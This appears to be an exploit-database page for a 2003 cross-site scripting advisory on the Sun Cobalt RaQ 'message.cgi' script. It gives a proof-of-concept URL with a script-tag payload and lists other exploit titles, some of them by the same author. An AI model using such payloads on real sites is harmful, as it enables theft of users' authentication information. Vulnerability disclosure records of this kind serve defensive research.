Menu

Search for hundreds of thousands of exploits

"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting"

Author

Exploit author

"Lorenzo Hernandez Garcia-Hierro"

Platform

Exploit platform

cgi

Release date

Exploit published date

2003-10-03

1
2
3
4
5
source: https://www.securityfocus.com/bid/8757/info

A problem with message.cgi script used by Cobalt RaQ appliances could lead to cross-site scripting. This could result in attacks attempting to steal authentication information. 

http://wwww.example.com:81/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C/script%3E
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2003-10-15 "Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting" webapps cfm "Lorenzo Hernandez Garcia-Hierro"
2003-10-03 "Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting" webapps cgi "Lorenzo Hernandez Garcia-Hierro"
2003-09-29 "Geeklog 1.3.x - Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-09-29 "Geeklog 1.3.x - SQL Injection" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-11 "phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - 'PDA_limit' Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-11 "phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - 'PAGE_id' Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-11 "phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-11 "PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-11 "phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - 'fatcat_id' Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-08 "PostNuke 0.6/0.7 web_links Module - TTitle Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-08 "PostNuke 0.6/0.7 Downloads Module - TTitle Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-08-04 "Macromedia Dreamweaver MX 6.0 - PHP User Authentication Suite Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-06-19 "pMachine 1.0/2.x - Multiple Script 'sfx' Full Path Disclosures" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-06-19 "pMachine 1.0/2.x - '/lib/' Multiple Script Direct Request Full Path Disclosures" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-06-19 "pMachine 1.0/2.x - Search Module Cross-Site Scripting" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-06-13 "Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-06-13 "Sphera HostingDirector 1.0/2.0/3.0 - VDS Control Panel Account Configuration Modification" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-06-09 "H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting" webapps java "Lorenzo Hernandez Garcia-Hierro"
2003-04-15 "osCommerce 2.2 - Authentication Bypass" webapps php "Lorenzo Hernandez Garcia-Hierro"
2003-04-15 "osCommerce 2.2 - 'product_info.php' Denial of Service" dos php "Lorenzo Hernandez Garcia-Hierro"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.